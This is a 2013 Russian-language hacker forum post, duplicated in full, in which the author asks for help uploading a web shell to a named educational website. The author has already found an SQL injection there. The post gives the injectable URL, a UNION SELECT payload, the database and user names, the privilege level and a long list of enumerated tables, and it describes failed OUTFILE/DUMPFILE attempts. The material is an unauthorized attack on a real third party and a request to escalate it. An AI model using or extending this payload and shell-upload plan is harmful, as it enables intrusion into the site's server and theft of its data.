khvdaiver
03.02.2013, 15:39
(модерам: не нашел тему о помощи - повесил пост в общем потоке. если что не так - исправте, пожалуйста)
Приветствую, атничатовцы!)
Такая проблема.
Есть сайт со скулей. Есть доступ к information_schema. Нашел выводимые поля => достал имена таблиц и имена полей. Осталось за малым - залить шелл (пых).
Проблемы: права USAGE, ко некотрымтабилцам нет доступа даже на SELECT, не могу залить шелл OUTFILE/DUMPFILE'ом, т.к нет прав FILE. =( Не могу добиться вывода шелла каким-нибудь энкодом символов (в выводимое поле), не выходит никак. Не могли бы помочь в этом деле? Может быть, какие-нибуь идейки? или решения? Буду очень благодарен.
Данные:
injection: ttp://hiik.ru/'/
выводимые поля: ttp://www.hiik.ru/1=1'%20union%20select%201,2,3%20--%20'3/
server: windows server 2003
***предположительно, всё болтается на IIS/PHP + какие-то перловские шаманства***
mysql_db: rasp
mysql_user: rasp
privilegies: USAGE (хотя, лучше всё равно всё рповерить)
доступ к information schema: ЕСТЬ
имена таблиц:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
audit
den
doljn
fakult
forms
isprav
kabinet
kafedry
kol_zayav
kppk_data
kppk_glav_prog
kppk_kursy
kppk_predp
kppk_prepod
kppk_program
kppk_raspis
kppk_slush
kppk_soot
kppk_svod
mesto
nagruzka
news
para
podgot_kurs
podraz
predmet
prepod
raspis
site
spec
structur
tel
telef
tree_oplata11
type_zan
uch_plan
uch_rasp_ex
user
zvan
Приветствую, атничатовцы!)
Такая проблема.
Есть сайт со скулей. Есть доступ к information_schema. Нашел выводимые поля => достал имена таблиц и имена полей. Осталось за малым - залить шелл (пых).
Проблемы: права USAGE, ко некотрымтабилцам нет доступа даже на SELECT, не могу залить шелл OUTFILE/DUMPFILE'ом, т.к нет прав FILE. =( Не могу добиться вывода шелла каким-нибудь энкодом символов (в выводимое поле), не выходит никак. Не могли бы помочь в этом деле? Может быть, какие-нибуь идейки? или решения? Буду очень благодарен.
Данные:
injection: ttp://hiik.ru/'/
выводимые поля: ttp://www.hiik.ru/1=1'%20union%20select%201,2,3%20--%20'3/
server: windows server 2003
***предположительно, всё болтается на IIS/PHP + какие-то перловские шаманства***
mysql_db: rasp
mysql_user: rasp
privilegies: USAGE (хотя, лучше всё равно всё рповерить)
доступ к information schema: ЕСТЬ
имена таблиц:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
audit
den
doljn
fakult
forms
isprav
kabinet
kafedry
kol_zayav
kppk_data
kppk_glav_prog
kppk_kursy
kppk_predp
kppk_prepod
kppk_program
kppk_raspis
kppk_slush
kppk_soot
kppk_svod
mesto
nagruzka
news
para
podgot_kurs
podraz
predmet
prepod
raspis
site
spec
structur
tel
telef
tree_oplata11
type_zan
uch_plan
uch_rasp_ex
user
zvan